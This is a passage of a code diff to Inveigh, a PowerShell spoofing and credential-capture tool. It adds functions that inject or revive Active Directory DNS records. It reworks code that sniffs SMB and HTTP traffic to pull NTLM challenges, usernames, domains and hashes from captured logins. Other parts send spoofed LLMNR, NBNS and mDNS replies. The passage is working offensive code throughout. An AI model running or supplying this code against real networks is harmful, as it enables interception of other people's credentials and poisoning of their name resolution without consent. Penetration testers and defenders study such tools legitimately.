+ $DNS_data += [System.Text.Encoding]::UTF8.GetBytes($Data)
+ }
+
+ }
+
+ [Byte[]]$DNS_TTL = [System.BitConverter]::GetBytes($TTL)
+ [Byte[]]$DNS_record = $DNS_length +
+ $DNS_type +
+ 0x05,0xF0,0x00,0x00 +
+ $SOASerialNumberArray[0..3] +
+ $DNS_TTL[3..0] +
+ 0x00,0x00,0x00,0x00
+
+ if($Static)
+ {
+ $DNS_record += 0x00,0x00,0x00,0x00
}
else
{
- $inveigh.DNS_list.Add("0," + $_.Name) > $null
- $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS host (A) record for " + $_.Name + " add failed") > $null
+ $timestamp = [Int64](([Datetime]::UtcNow)-(Get-Date "1/1/1601")).TotalHours
+ $timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($timestamp))
+ $timestamp = $timestamp.Split("-") | ForEach-Object{[System.Convert]::ToInt16($_,16)}
+ $timestamp = $timestamp[0..3]
+ $DNS_record += $timestamp
}
+
+ $DNS_record += $DNS_data
+ return [Byte[]]$DNS_record
}
- function DNSCheck
+ function Invoke-ADIDNSSpoofer
{
- param ([String]$DNSData,[Array]$DNSHostsIgnore,[Int]$DNSThreshold,[Int]$DNSTTL)
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][String]$Data,
+ [parameter(Mandatory=$false)][String]$Domain,
+ [parameter(Mandatory=$false)][String]$DomainController,
+ [parameter(Mandatory=$true)][String]$Node,
+ [parameter(Mandatory=$false)]$Partition,
+ [parameter(Mandatory=$false)][String]$Zone,
+ [parameter(Mandatory=$false)][Int]$TTL,
+ [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$Credential
+ )
- $inveigh.requested_host_list | Group-Object | ForEach-Object {
-
- if($_.Count -gt $DNSThreshold)
+ try
+ {
+ $node_added = New-ADIDNSNode -Credential $Credential -Data $Data -Domain $Domain -DomainController $DomainController -Node $Node -Partition $Partition -TTL $TTL -Zone $Zone
+
+ if($inveigh.ADIDNS -and !$node_added)
+ {
+ $node_tombstoned = Get-ADIDNSNodeTombstoned -Credential $Credential -Domain $Domain -DomainController $DomainController -Node $Node -Partition $Partition -Zone $Zone
+
+ if($node_tombstoned)
+ {
+ Enable-ADIDNSNode -Credential $Credential -Data $Data -Domain $Domain -DomainController $DomainController -Node $Node -Partition $Partition -TTL $TTL -Zone $Zone
+ }
+
+ }
+
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] ADIDNS spoofer disabled due to error") > $null
+ $inveigh.ADIDNS = $null
+ }
+
+ }
+
+ function Invoke-ADIDNSCheck
+ {
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][Array]$Ignore,
+ [parameter(Mandatory=$false)][String]$Data,
+ [parameter(Mandatory=$false)][String]$Domain,
+ [parameter(Mandatory=$false)][String]$DomainController,
+ [parameter(Mandatory=$false)]$Partition,
+ [parameter(Mandatory=$false)][String]$Zone,
+ [parameter(Mandatory=$false)][Int]$Threshold,
+ [parameter(Mandatory=$false)][Int]$TTL,
+ [parameter(Mandatory=$false)]$RequestTable,
+ [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$Credential
+ )
+
+ Start-Sleep -S 1
+
+ ForEach($request in $RequestTable.Keys)
+ {
+
+ if($RequestTable.$request.Count -gt $Threshold)
{
+
+ if(!$inveigh.DNS_table.ContainsKey($request))
+ {
+ $inveigh.DNS_table.Add($request,"")
+ }
- if($DNSHostsIgnore -NotContains $_.Name -and $inveigh.DNS_list -NotContains "0,$($_.Name)" -and $inveigh.DNS_list -NotContains "1,$($_.Name)")
+ if($Ignore -NotContains $request -and $inveigh.DNS_table.$request -ne 0 -and $inveigh.DNS_table.$request -ne 1)
{
- DNSUpdate $_.Name $DNSData $DNSTTL
+ Invoke-ADIDNSSpoofer -Credential $Credential -Data $Data -Domain $Domain -DomainController $DomainController -Node $request -Partition $Partition -TTL $TTL -Zone $Zone
}
- elseif($DNSHostsIgnore -Contains $_.Name)
+ elseif($Ignore -Contains $request)
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] Ignored $($_.Name) for DNS injection")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] ADIDNS spoofer ignored $request")
}
}
-
+
+ Start-Sleep -m 10
}
}
@@ -1536,54 +2394,137 @@ $DNS_functions_scriptblock =
# SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge/response
$SMB_NTLM_functions_scriptblock =
{
-
- function SMBNTLMChallenge
+
+ function Get-SMBConnection
{
- param ([Byte[]]$payload_bytes)
+ param ([Byte[]]$Payload,[String]$Session,[String]$Port)
- $payload = [System.BitConverter]::ToString($payload_bytes)
- $payload = $payload -replace "-",""
- $NTLM_index = $payload.IndexOf("4E544C4D53535000")
+ $payload_converted = [System.BitConverter]::ToString($Payload)
+ $payload_converted = $payload_converted -replace "-",""
+ $SMB_index = $payload_converted.IndexOf("FF534D42")
- if($NTLM_index -gt 0 -and $payload.SubString(($NTLM_index + 16),8) -eq "02000000")
+ if(!$inveigh.SMB_session_table.ContainsKey($Session) -and $SMB_index -gt 0 -and $payload_converted.SubString(($SMB_index + 8),2) -eq "72")
{
- $NTLM_challenge = $payload.SubString(($NTLM_index + 48),16)
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB($Port) negotiation request detected from $Session") > $null
+ }
+
+ if(!$inveigh.SMB_session_table.ContainsKey($Session) -and $SMB_index -gt 0)
+ {
+ $inveigh.SMB_session_table.Add($Session,"")
+ }
+
+ $SMB_index = $payload_converted.IndexOf("FE534D42")
+
+ if(!$inveigh.SMB_session_table.ContainsKey($Session) -and $SMB_index -gt 0 -and $payload_converted.SubString(($SMB_index + 24),4) -eq "0000")
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB($Port) negotiation request detected from $Session") > $null
+ }
+
+ if(!$inveigh.SMB_session_table.ContainsKey($Session) -and $SMB_index -gt 0)
+ {
+ $inveigh.SMB_session_table.Add($Session,"")
}
- return $NTLM_challenge
}
- function SMBNTLMResponse
+ function Get-SMBNTLMChallenge
{
- param ([Byte[]]$payload_bytes)
+ param ([Byte[]]$Payload)
- $payload = [System.BitConverter]::ToString($payload_bytes)
- $payload = $payload -replace "-",""
- $NTLMSSP_hex_offset = $payload.IndexOf("4E544C4D53535000")
+ $payload_converted = [System.BitConverter]::ToString($Payload)
+ $payload_converted = $payload_converted -replace "-",""
+ $NTLM_index = $payload_converted.IndexOf("4E544C4D53535000")
- if($NTLMSSP_hex_offset -gt 0 -and $payload.SubString(($NTLMSSP_hex_offset + 16),8) -eq "03000000")
+ if($payload_converted.SubString(($NTLM_index + 16),8) -eq "02000000")
{
- $NTLMSSP_offset = $NTLMSSP_hex_offset / 2
+ $NTLM_challenge = $payload_converted.SubString(($NTLM_index + 48),16)
+ }
- $LM_length = DataLength2 ($NTLMSSP_offset + 12) $payload_bytes
- $LM_offset = DataLength4 ($NTLMSSP_offset + 16) $payload_bytes
- $LM_response = [System.BitConverter]::ToString($payload_bytes[($NTLMSSP_offset + $LM_offset)..($NTLMSSP_offset + $LM_offset + $LM_length - 1)]) -replace "-",""
+ $target_name_length = Get-UInt16DataLength (($NTLM_index + 24) / 2) $Payload
+ $negotiate_flags = [System.Convert]::ToInt16(($payload_converted.SubString(($NTLM_index + 44),2)),16)
+ $negotiate_flags = [Convert]::ToString($negotiate_flags,2)
+ $target_info_flag = $negotiate_flags.SubString(0,1)
- $NTLM_length = DataLength2 ($NTLMSSP_offset + 20) $payload_bytes
- $NTLM_offset = DataLength4 ($NTLMSSP_offset + 24) $payload_bytes
- $NTLM_response = [System.BitConverter]::ToString($payload_bytes[($NTLMSSP_offset + $NTLM_offset)..($NTLMSSP_offset + $NTLM_offset + $NTLM_length - 1)]) -replace "-",""
+ if($target_info_flag -eq 1)
+ {
+ $target_info_index = ($NTLM_index + 80) / 2
+ $target_info_index = $target_info_index + $target_name_length + 16
+ $target_info_item_type = $Payload[$target_info_index]
+ $i = 0
- $domain_length = DataLength2 ($NTLMSSP_offset + 28) $payload_bytes
- $domain_offset = DataLength4 ($NTLMSSP_offset + 32) $payload_bytes
- $NTLM_domain_string = DataToString ($NTLMSSP_offset + $domain_offset) $domain_length $payload_bytes
+ while($target_info_item_type -ne 0 -and $i -lt 10)
+ {
+ $target_info_item_length = Get-UInt16DataLength ($target_info_index + 2) $Payload
- $user_length = DataLength2 ($NTLMSSP_offset + 36) $payload_bytes
- $user_offset = DataLength4 ($NTLMSSP_offset + 40) $payload_bytes
- $NTLM_user_string = DataToString ($NTLMSSP_offset + $user_offset) $user_length $payload_bytes
+ switch($target_info_item_type)
+ {
- $host_length = DataLength2 ($NTLMSSP_offset + 44) $payload_bytes
- $host_offset = DataLength4 ($NTLMSSP_offset + 48) $payload_bytes
- $NTLM_host_string = DataToString ($NTLMSSP_offset + $host_offset) $host_length $payload_bytes
+ 2
+ {
+ $netBIOS_domain_name = Convert-DataToString ($target_info_index + 4) $target_info_item_length $Payload
+ }
+
+ 3
+ {
+ $DNS_computer_name = Convert-DataToString ($target_info_index + 4) $target_info_item_length $Payload
+ }
+
+ 4
+ {
+ $DNS_domain_name = Convert-DataToString ($target_info_index + 4) $target_info_item_length $Payload
+ }
+
+ }
+
+ $target_info_index = $target_info_index + $target_info_item_length + 4
+ $target_info_item_type = $Payload[$target_info_index]
+ $i++
+ }
+
+ if($netBIOS_domain_name -and $DNS_domain_name -and !$inveigh.domain_mapping_table.$netBIOS_domain_name -and $netBIOS_domain_name -ne $DNS_domain_name)
+ {
+ $inveigh.domain_mapping_table.Add($netBIOS_domain_name,$DNS_domain_name)
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] Domain mapping added for $netBIOS_domain_name to $DNS_domain_name") > $null
+ }
+
+ if($inveigh.enumeration_data | Where-Object {$_.IP -eq $target -and !$_.Hostname})
+ {
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
+ $inveigh.enumeration_data[$target_index].Hostname = $DNS_computer_name
+ }
+
+ }
+
+ return $NTLM_challenge
+ }
+
+ function Get-SMBNTLMResponse
+ {
+ param ([Byte[]]$Payload,[String]$Session)
+
+ $payload_converted = [System.BitConverter]::ToString($Payload)
+ $payload_converted = $payload_converted -replace "-",""
+ $NTLMSSP_hex_offset = $payload_converted.IndexOf("4E544C4D53535000")
+
+ if($NTLMSSP_hex_offset -gt 0 -and $payload_converted.SubString(($NTLMSSP_hex_offset + 16),8) -eq "03000000")
+ {
+ $NTLMSSP_offset = $NTLMSSP_hex_offset / 2
+ $LM_length = Get-UInt16DataLength ($NTLMSSP_offset + 12) $Payload
+ $LM_offset = Get-UInt32DataLength ($NTLMSSP_offset + 16) $Payload
+ $LM_response = [System.BitConverter]::ToString($Payload[($NTLMSSP_offset + $LM_offset)..($NTLMSSP_offset + $LM_offset + $LM_length - 1)]) -replace "-",""
+ $NTLM_length = Get-UInt16DataLength ($NTLMSSP_offset + 20) $Payload
+ $NTLM_offset = Get-UInt32DataLength ($NTLMSSP_offset + 24) $Payload
+ $NTLM_response = [System.BitConverter]::ToString($Payload[($NTLMSSP_offset + $NTLM_offset)..($NTLMSSP_offset + $NTLM_offset + $NTLM_length - 1)]) -replace "-",""
+ $domain_length = Get-UInt16DataLength ($NTLMSSP_offset + 28) $Payload
+ $domain_offset = Get-UInt32DataLength ($NTLMSSP_offset + 32) $Payload
+ $NTLM_domain_string = Convert-DataToString ($NTLMSSP_offset + $domain_offset) $domain_length $Payload
+ $user_length = Get-UInt16DataLength ($NTLMSSP_offset + 36) $Payload
+ $user_offset = Get-UInt32DataLength ($NTLMSSP_offset + 40) $Payload
+ $NTLM_user_string = Convert-DataToString ($NTLMSSP_offset + $user_offset) $user_length $Payload
+ $host_length = Get-UInt16DataLength ($NTLMSSP_offset + 44) $Payload
+ $host_offset = Get-UInt32DataLength ($NTLMSSP_offset + 48) $Payload
+ $NTLM_host_string = Convert-DataToString ($NTLMSSP_offset + $host_offset) $host_length $Payload
+ $NTLM_challenge = $inveigh.SMB_session_table.$Session
if($NTLM_length -gt 24)
{
@@ -1659,6 +2600,7 @@ $SMB_NTLM_functions_scriptblock =
}
+ Invoke-SessionUpdate $NTLM_domain_string $NTLM_user_string $NTLM_host_string $source_IP
}
}
@@ -1693,8 +2635,6 @@ $HTTP_scriptblock =
$HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
}
- $inveigh.HTTP_challenge_queue.Add($ClientIPAddress + $ClientPort + ',' + $HTTP_challenge) > $null
-
if($NTLMESS)
{
$HTTP_NTLM_negotiation_flags = 0x05,0x82,0x89,0x0a
@@ -1704,19 +2644,46 @@ $HTTP_scriptblock =
$HTTP_NTLM_negotiation_flags = 0x05,0x82,0x81,0x0a
}
- $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
- 0x00,0x00,0x00 +
+ $inveigh.HTTP_challenge_queue.Add($ClientIPAddress + $ClientPort + ',' + $HTTP_challenge) > $null
+ $hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.computer_name)
+ $netBIOS_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.netBIOS_domain)
+ $DNS_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.DNS_domain)
+ $DNS_hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.DNS_computer_name)
+ $hostname_length = [System.BitConverter]::GetBytes($hostname_bytes.Length)[0,1]
+ $netBIOS_domain_length = [System.BitConverter]::GetBytes($netBIOS_domain_bytes.Length)[0,1]
+ $DNS_domain_length = [System.BitConverter]::GetBytes($DNS_domain_bytes.Length)[0,1]
+ $DNS_hostname_length = [System.BitConverter]::GetBytes($DNS_hostname_bytes.Length)[0,1]
+ $target_length = [System.BitConverter]::GetBytes($hostname_bytes.Length + $netBIOS_domain_bytes.Length + $DNS_domain_bytes.Length + $DNS_domain_bytes.Length + $DNS_hostname_bytes.Length + 36)[0,1]
+ $target_offset = [System.BitConverter]::GetBytes($netBIOS_domain_bytes.Length + 56)
+
+ $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 +
+ $netBIOS_domain_length +
+ $netBIOS_domain_length +
+ 0x38,0x00,0x00,0x00 +
$HTTP_NTLM_negotiation_flags +
$HTTP_challenge_bytes +
- 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
- 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
- 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,
- 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,
- 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,
- 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,
- 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,
- 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,
- 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
+ $target_length +
+ $target_length +
+ $target_offset +
+ 0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f +
+ $netBIOS_domain_bytes +
+ 0x02,0x00 +
+ $netBIOS_domain_length +
+ $netBIOS_domain_bytes +
+ 0x01,0x00 +
+ $hostname_length +
+ $hostname_bytes +
+ 0x04,0x00 +
+ $DNS_domain_length +
+ $DNS_domain_bytes +
+ 0x03,0x00 +
+ $DNS_hostname_length +
+ $DNS_hostname_bytes +
+ 0x05,0x00 +
+ $DNS_domain_length +
+ $DNS_domain_bytes +
+ 0x07,0x00,0x08,0x00 +
$HTTP_timestamp +
0x00,0x00,0x00,0x00,0x0a,0x0a
@@ -1966,10 +2933,10 @@ $HTTP_scriptblock =
}
elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00')
{
- $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes
- $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes
- $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes
- $HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes
+ $HTTP_NTLM_length = Get-UInt16DataLength 20 $HTTP_request_bytes
+ $HTTP_NTLM_offset = Get-UInt32DataLength 24 $HTTP_request_bytes
+ $HTTP_NTLM_domain_length = Get-UInt16DataLength 28 $HTTP_request_bytes
+ $HTTP_NTLM_domain_offset = Get-UInt32DataLength 32 $HTTP_request_bytes
[String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + '*'
$inveigh.HTTP_challenge_queue.Remove($NTLM_challenge)
$NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1)
@@ -1980,15 +2947,15 @@ $HTTP_scriptblock =
}
else
{
- $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes
+ $HTTP_NTLM_domain_string = Convert-DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes
}
- $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes
- $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes
- $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes
- $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes
- $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes
- $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes
+ $HTTP_NTLM_user_length = Get-UInt16DataLength 36 $HTTP_request_bytes
+ $HTTP_NTLM_user_offset = Get-UInt32DataLength 40 $HTTP_request_bytes
+ $HTTP_NTLM_user_string = Convert-DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes
+ $HTTP_NTLM_host_length = Get-UInt16DataLength 44 $HTTP_request_bytes
+ $HTTP_NTLM_host_offset = Get-UInt32DataLength 48 $HTTP_request_bytes
+ $HTTP_NTLM_host_string = Convert-DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes
$HTTP_username_full = $HTTP_NTLM_domain_string + "\" + $HTTP_NTLM_user_string
if($HTTP_NTLM_length -eq 24) # NTLMv1
@@ -2058,6 +3025,11 @@ $HTTP_scriptblock =
}
+ if($HTTP_NTLM_domain_string -and $HTTP_NTLM_user_string -and $HTTP_NTLM_host_string -and $HTTP_source_IP)
+ {
+ Invoke-SessionUpdate $HTTP_NTLM_domain_string $HTTP_NTLM_user_string $HTTP_NTLM_host_string $HTTP_source_IP
+ }
+
if ($inveigh.IP_capture_list -notcontains $HTTP_source_IP -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $HTTP_source_IP -ne $IP)
{
$inveigh.IP_capture_list.Add($HTTP_source_IP) > $null
@@ -2269,10 +3241,10 @@ $HTTP_scriptblock =
# Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer
$sniffer_scriptblock =
{
- param ($DNSHostsIgnore,$DNSThreshold,$DNSTTL,$Evade,$IP,$LLMNR,$LLMNR_response_message,$LLMNRTTL,$mDNS,
- $mDNS_response_message,$mDNSTypes,$mDNSTTL,$NBNS,$NBNS_response_message,$NBNSTypes,$NBNSTTL,$SMB,
- $SpooferHostsIgnore,$SpooferHostsReply,$SpooferIP,$SpooferIPsIgnore,$SpooferIPsReply,
- $SpooferLearning,$SpooferLearningDelay,$SpooferLearningInterval)
+ param ($Evade,$IP,$LLMNR,$LLMNR_response_message,$LLMNRTTL,$mDNS,$mDNS_response_message,$mDNSTypes,$mDNSTTL,
+ $NBNS,$NBNS_response_message,$NBNSTypes,$NBNSTTL,$SMB,$SpooferHostsIgnore,$SpooferHostsReply,
+ $SpooferIP,$SpooferIPsIgnore,$SpooferIPsReply,$SpooferLearning,$SpooferLearningDelay,
+ $SpooferLearningInterval)
$sniffer_running = $true
$byte_in = New-Object System.Byte[] 4
@@ -2320,7 +3292,7 @@ $sniffer_scriptblock =
$binary_reader = New-Object System.IO.BinaryReader($memory_stream)
$version_HL = $binary_reader.ReadByte()
$binary_reader.ReadByte() > $null
- $total_length = DataToUInt16 $binary_reader.ReadBytes(2)
+ $total_length = Convert-DataToUInt16 $binary_reader.ReadBytes(2)
$binary_reader.ReadBytes(5) > $null
$protocol_number = $binary_reader.ReadByte()
$binary_reader.ReadBytes(2) > $null
@@ -2335,8 +3307,8 @@ $sniffer_scriptblock =
6
{ # TCP
- $source_port = DataToUInt16 $binary_reader.ReadBytes(2)
- $destination_port = DataToUInt16 $binary_reader.ReadBytes(2)
+ $source_port = Convert-DataToUInt16 $binary_reader.ReadBytes(2)
+ $destination_port = Convert-DataToUInt16 $binary_reader.ReadBytes(2)
$binary_reader.ReadBytes(8) > $null
$TCP_header_length = [Int]"0x$(('{0:X}' -f $binary_reader.ReadByte())[0])" * 4
$binary_reader.ReadBytes(7) > $null
@@ -2349,16 +3321,13 @@ $sniffer_scriptblock =
{
if($SMB -eq 'Y')
{
+ Get-SMBConnection $payload_bytes "$source_IP`:$source_port" "139"
- if($NTLM_challenge -and $client_IP -eq $source_IP -and $client_port -eq $source_port)
+ if($inveigh.SMB_session_table."$source_IP`:$source_port")
{
- SMBNTLMResponse $payload_bytes
+ Get-SMBNTLMResponse $payload_bytes "$source_IP`:$source_port"
}
- $client_IP = ""
- $client_port = ""
- $NTLM_challenge = ""
-
}
}
@@ -2367,16 +3336,13 @@ $sniffer_scriptblock =
if($SMB -eq 'Y')
{
+ Get-SMBConnection $payload_bytes "$source_IP`:$source_port" "445"
- if($NTLM_challenge -and $client_IP -eq $source_IP -and $client_port -eq $source_port)
+ if($inveigh.SMB_session_table."$source_IP`:$source_port")
{
- SMBNTLMResponse $payload_bytes
+ Get-SMBNTLMResponse $payload_bytes "$source_IP`:$source_port"
}
- $client_IP = ""
- $client_port = ""
- $NTLM_challenge = ""
-
}
}
@@ -2392,9 +3358,14 @@ $sniffer_scriptblock =
if($SMB -eq 'Y')
{
- $client_IP = $destination_IP
- $client_port = $destination_port
- $NTLM_challenge = SMBNTLMChallenge $payload_bytes
+ $NTLM_challenge = Get-SMBNTLMChallenge $payload_bytes
+
+ if($NTLM_challenge)
+ {
+ $inveigh.SMB_session_table."$destination_IP`:$destination_port" = $NTLM_challenge
+ $NTLM_challenge = ""
+ }
+
}
}
@@ -2404,9 +3375,14 @@ $sniffer_scriptblock =
if($SMB -eq 'Y')
{
- $client_IP = $destination_IP
- $client_port = $destination_port
- $NTLM_challenge = SMBNTLMChallenge $payload_bytes
+ $NTLM_challenge = Get-SMBNTLMChallenge $payload_bytes
+
+ if($NTLM_challenge -and $destination_IP -ne $source_IP)
+ {
+ $inveigh.SMB_session_table."$destination_IP`:$destination_port" = $NTLM_challenge
+ $NTLM_challenge = ""
+ }
+
}
}
@@ -2418,10 +3394,10 @@ $sniffer_scriptblock =
17
{ # UDP
$source_port = $binary_reader.ReadBytes(2)
- $endpoint_source_port = DataToUInt16 ($source_port)
- $destination_port = DataToUInt16 $binary_reader.ReadBytes(2)
+ $endpoint_source_port = Convert-DataToUInt16 ($source_port)
+ $destination_port = Convert-DataToUInt16 $binary_reader.ReadBytes(2)
$UDP_length = $binary_reader.ReadBytes(2)
- $UDP_length_uint = DataToUInt16 ($UDP_length)
+ $UDP_length_uint = Convert-DataToUInt16 ($UDP_length)
$binary_reader.ReadBytes(2) > $null
$payload_bytes = $binary_reader.ReadBytes(($UDP_length_uint - 2) * 4)
@@ -2573,7 +3549,7 @@ $sniffer_scriptblock =
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (
!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($NBNS_query_string.Trim() -ne '*') -and (
$SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)) -and ($source_IP -ne $IP) -and (
- $NBNSTypes -contains $NBNS_query_type) -and $destination_IP.IPAddressToString -ne $IP)
+ $NBNSTypes -contains $NBNS_query_type) -and ($Evade -and $destination_IP.IPAddressToString -ne $IP))
{
if($SpooferLearning -eq 'N' -or !$NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
@@ -2583,19 +3559,7 @@ $sniffer_scriptblock =
$NBNS_destination_point = New-Object Net.IPEndpoint($source_IP,$endpoint_source_port)
$NBNS_send_socket.SendTo($NBNS_response_packet,$NBNS_destination_point)
$NBNS_send_socket.Close()
- $NBNS_response_message = "[spoofed response sent]"
-
- if($inveigh.requested_host_IP_list -NotContains "$source_IP $NBNS_query_string")
- {
- $inveigh.requested_host_IP_list.Add("$source_IP $NBNS_query_string") > $null
- $inveigh.requested_host_list.Add($NBNS_query_string.ToLower()) > $null
- }
-
- if($inveigh.DNS)
- {
- DNSCheck $SpooferIP $DNSHostsIgnore $DNSThreshold $DNSTTL
- }
-
+ $NBNS_response_message = "[Response Sent]"
}
else
{
@@ -2621,6 +3585,28 @@ $sniffer_scriptblock =
if(!$NBNS_request_ignore -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00')
{
$inveigh.output_queue.Add("$NBNS_response_type [$(Get-Date -format s)] NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") > $null
+
+ if($inveigh.ADIDNS -eq 'Combo')
+ {
+
+ if(!$inveigh.request_table.ContainsKey($NBNS_query_string))
+ {
+ $inveigh.request_table.Add($NBNS_query_string.ToLower(),[Array]$source_IP.IPAddressToString)
+ $inveigh.request_table_updated = $true
+ }
+ else
+ {
+
+ if($inveigh.request_table.$NBNS_query_string -NotContains $source_IP.IPAddressToString)
+ {
+ $inveigh.request_table.$NBNS_query_string += $source_IP.IPAddressToString
+ $inveigh.request_table_updated = $true
+ }
+
+ }
+
+ }
+
}
elseif($SpooferLearning -eq 'Y' -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01' -and $NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
{
@@ -2647,7 +3633,7 @@ $sniffer_scriptblock =
{
$UDP_length[0] += 10
$mDNS_query_payload_bytes = $payload_bytes[(12)..($payload_bytes.Length - 5)]
- $mDNS_query_string = DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes
+ $mDNS_query_string = Convert-DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes
$mDNS_query_string_full = $mDNS_query_string + ".local"
$mDNS_response_type = "[+]"
@@ -2677,7 +3663,7 @@ $sniffer_scriptblock =
$destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port)
$send_socket.SendTo($mDNS_response_packet,$destination_point)
$send_socket.Close()
- $mDNS_response_message = "[spoofed response sent]"
+ $mDNS_response_message = "[Response Sent]"
}
else
{
@@ -2694,7 +3680,7 @@ $sniffer_scriptblock =
{
$UDP_length[0] += 4
$mDNS_query_payload_bytes = $payload_bytes[12..($payload_bytes[12] + 12)]
- $mDNS_query_string = DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes
+ $mDNS_query_string = Convert-DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes
$mDNS_query_string_full = $mDNS_query_string + ".local"
$mDNS_response_type = "[+]"
@@ -2726,7 +3712,7 @@ $sniffer_scriptblock =
$destination_point = New-Object System.Net.IPEndpoint([IPAddress]"224.0.0.251",5353)
$send_socket.SendTo($mDNS_response_packet,$destination_point)
$send_socket.Close()
- $mDNS_response_message = "[spoofed response sent]"
+ $mDNS_response_message = "[Response Sent]"
}
else
{
@@ -2833,8 +3819,8 @@ $sniffer_scriptblock =
if(($inveigh.valid_host_list -notcontains $LLMNR_query_string -or $SpooferHostsReply -contains $LLMNR_query_string) -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (
!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and (
